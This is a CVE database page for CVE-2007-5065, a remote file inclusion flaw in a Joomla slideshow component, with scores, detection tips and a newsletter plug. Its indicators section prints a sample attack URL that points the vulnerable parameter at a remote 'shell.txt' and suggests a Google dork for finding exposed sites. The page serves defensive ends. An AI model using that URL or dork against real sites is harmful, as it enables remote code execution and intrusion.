cbcvebase.
CVE-2007-5065
published 2007-09-24

CVE-2007-5065: PHP remote file inclusion vulnerability in admin.slideshow1.php in the Flash Slide Show (com_slideshow) component for Joomla! allows remote attackers to…

PriorityP356high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
42.31%
98.5th percentile
PHP remote file inclusion vulnerability in admin.slideshow1.php in the Flash Slide Show (com_slideshow) component for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_live_site parameter.

Detection & IOCsextracted from sources · hover to see the quote

pathadmin.slideshow1.php
urlhttp://domain.com/Joomla_Path/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://shell.txt
path/components/com_slideshow/admin.slideshow1.php
commandinclude( "$mosConfig_live_site/components/com_slideshow1/about.html" );
  • Detect RFI exploitation attempts targeting the mosConfig_live_site parameter in admin.slideshow1.php — look for HTTP requests containing an external URL value in this parameter
  • Use Google dork 'inurl:/com_slideshow/' to identify exposed vulnerable Joomla installations; monitor for this pattern in web server access logs as a reconnaissance indicator
  • ·The vulnerable include is on line 3 of admin.slideshow1.php, meaning exploitation occurs very early in script execution with no prior authentication or sanitization checks
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.